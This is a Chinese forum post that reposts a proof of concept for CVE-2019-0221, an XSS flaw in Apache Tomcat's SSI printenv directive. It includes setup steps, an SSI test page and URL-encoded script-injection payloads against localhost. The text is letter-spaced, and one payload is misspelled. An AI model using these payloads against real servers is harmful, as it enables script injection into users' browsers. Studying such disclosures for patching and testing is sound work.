搜索

[29067] 2021-07-14_【漏洞利用】ApacheTomcat9.0.0.M1跨站脚本

文档创建者:s7ckTeam
浏览次数:66
最后更新:2025-01-19
2021-07-14_【漏洞利用】ApacheTomcat9.0.0.M1跨站脚本 A p a c h e   T o m c a t   9 . 0 . 0 . M 1   O t s   2 0 2 1 - 0 7 - 1 4 O t s   2 0 1 9     A p a c h e   T o m c a t   9 . 0 . 0 M 1   A p a c h e   T o m c a t   S S I   p r i n t e n v   C o m m a n d   X S S   ( C V E - 2 0 1 9 - 0 2 2 1 )   2 0 2 1     7     1 2   h x x p : / / l o c a l h o s t : 8 0 8 0 / p r i n t e n v . s h t m l ? % 3 C s c r i p t % 3 E a I e r t ( % 2 7 x s s % 2 7 ) % 3 C / s c r i p t % 3 E #   E x p l o i t   T i t l e :   A p a c h e   T o m c a t   9 . 0 . 0 . M 1   -   C r o s s - S i t e   S c r i p t i n g   ( X S S ) #   D a t e :   0 5 / 2 1 / 2 0 1 9 #   E x p l o i t   A u t h o r :   C e n t r a l   I n f o S e c #   V e r s i o n :   A p a c h e   T o m c a t   9 . 0 . 0 . M 1   t o   9 . 0 . 0 . 1 7 ,   8 . 5 . 0   t o   8 . 5 . 3 9 ,   a n d   7 . 0 . 0   t o   7 . 0 . 9 3 #   C V E   :   C V E - 2 0 1 9 - 0 2 2 1 #   R e q u i r e m e n t s : #   S S I   s u p p o r t   m u s t   b e   e n a b l e d   w i t h i n   A p a c h e   T o m c a t .   S S I   s u p p o r t   i s   n o t   e n a b l e d   b y   d e f a u l t . #   A   f i l e   ( u s u a l l y   " * . s h t m l " )   w i t h   t h e   " p r i n t e n v "   S S I   d i r e c t i v e   m u s t   e x i s t   w i t h i n   t h e   w e b   a p p l i c a t i o n . #   T h e   f i l e   m u s t   b e   a c c e s s i b l e . #   P r o o f   o f   C o n c e p t : #   I n s t a l l   a   J a v a   R u n t i m e   E n v i r o n m e n t   ( J R E ) #   D o w n l o a d   a   v u l n e r a b l e   v e r s i o n   o f   T o m c a t   a n d   e x t r a c t   t h e   c o n t e n t s #   M o d i f y   l i n e   1 9   o f   t h e   c o n f c o n t e x t . x m l   f i l e   t o   g l o b a l l y   e n a b l e   p r i v i l e g e d   c o n t e x t C o n t e x t   p r i v i l e g e d = " t r u e " > #   M o d i f y   c o n f w e b . x m l   t o   e n a b l e   t h e   S S I   S e r v l e t   a s   p e r   t h e   A p a c h e   T o m c a t   U s e r   G u i d e #   P u t   t h e   f o l l o w i n g   c o d e   i n   " w e b a p p s / R O O T / s s i / p r i n t e n v . s h t m l " < h t m l >     < b o d y >         E c h o :   < ! - -   # e c h o   v a r = " Q U E R Y _ S T R I N G _ U N E S C A P E D "   - - >   < b r / >   < b r / >         P r i n t e n v :   < ! - -   # p r i n t e n v   - - >     < / b o d y > < / h t m l > #   R u n   T o m c a t c d   b i n c a t a l i n a   r u n #   C a l l   t h e   f o l l o w i n g   U R L s   t o   o b s e r v e   t h e   X S S .   Y o u   m a y   n e e d   t o   u s e   F i r e F o x .   O b s e r v e   t h e   d i f f e r e n c e   b e t w e e n   t h e   " e c h o "   d i r e c t i v e   w h i c h   e s c a p e s   p r o p e r l y   a n d   t h e   " p r i n t e n v "   d i r e c t i v e   w h i c h   d o e s   n o t   e s c a p e   p r o p e r l y h t t p : / / l o c a l h o s t : 8 0 8 0 / s s i / p r i n t e n v . s h t m l ? % 3 C b r / % 3 E % 3 C b r / % 3 E % 3 C h 1 % 3 E X S S % 3 C / h 1 % 3 E % 3 C b r / % 3 E % 3 C b r / % 3 E h t t p : / / l o c a l h o s t : 8 0 8 0 / p r i n t e n v . s h t m l ? % 3 C s c r i p t % 3 E a l e r t ( % 2 7 x s s % 2 7 ) % 3 C / s c r i p t % 3 E
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理